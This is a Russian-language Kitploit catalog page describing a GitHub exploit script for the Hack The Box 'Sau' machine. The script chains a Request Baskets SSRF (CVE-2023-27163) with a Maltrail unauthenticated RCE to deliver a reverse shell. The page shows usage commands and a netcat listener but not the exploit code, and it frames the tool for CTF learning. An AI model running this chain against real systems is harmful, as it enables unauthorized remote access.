Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
htb-sau-exploit-chain — Автоматизированная цепочка эксплойтов для HTB Sau — CVE-2023-27163 (SSRF) + Maltrail неаутентифицированный RCE → Reverse Shell | Kitploit
Инструменты/GitHubGitHub/tombstoneghost/htb-sau-exploit-chain
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийCTFТестирование на ПроникновениеОбучение и Образование
GitHubtombstoneghost/htb-sau-exploit-chain

htb-sau-exploit-chain

Автоматизированная цепочка эксплойтов для HTB Sau — CVE-2023-27163 (SSRF) + Maltrail неаутентифицированный RCE → Reverse Shell

Репозиторий
4 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Цепочка эксплойтов HTB Sau — CVE-2023-27163 (SSRF) + автоматизация RCE в Maltrail

Python-скрипт эксплойта, который объединяет CVE-2023-27163 (Server-Side Request Forgery в Request Baskets ≤ 1.2.1) с неаутентифицированной уязвимостью удалённого выполнения кода в Maltrail 0.53, доставляя reverse shell. Разработан для машины Sau на Hack The Box.


📌 Обзор

Этот скрипт автоматизирует путь эксплуатации, необходимый для получения начального доступа к цели:

  1. Эксплуатируя CVE-2023-27163 для получения рабочего bucket-эндпоинта
  2. Используя открытый сервис для взаимодействия с Maltrail
  3. Запуская неаутентифицированный RCE в Maltrail
  4. Доставляя reverse shell на машину атакующего

⚙️ Использование

root@kitploit:~
python3 exploit.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>

Пример:

root@kitploit:~
python3 exploit.py http://10.10.11.224 10.10.14.6 4444

🎧 Netcat Listener (Важно)

Перед запуском эксплойта запустите listener на своей машине, чтобы поймать reverse shell:

root@kitploit:~
nc -lvnp <LISTENER_PORT>

Пример:

root@kitploit:~
nc -lvnp 4444

🧩 Параметры

ПараметрОписание
TARGET_URLБазовый URL цели (например, http://IP)
LISTENER_IPIP вашей атакующей машины
LISTENER_PORTПорт для приёма reverse shell

🚀 Ход эксплуатации

  • Нормализовать URL цели
  • Запустить CVE-2023-27163 для создания/доступа к request basket
  • Извлечь доступный эндпоинт (bucket_url)
  • Использовать bucket для взаимодействия с Maltrail
  • Выполнить payload для запуска reverse shell

⚠️ Примечания

  • Убедитесь, что ваш listener запущен до выполнения скрипта
  • Удалите завершающий / из URL цели (обрабатывается автоматически в скрипте)
  • Разработан специально для машины HTB Sau — может не быть универсальным

📚 Ссылки

  • CVE-2023-27163 (Request Baskets)
  • Неаутентифицированный RCE в Maltrail

🛑 Отказ от ответственности

Этот проект предназначен для образовательных целей и использования в авторизованных средах, таких как Hack The Box. Не используйте его против систем без соответствующего разрешения.

Скачать инструмент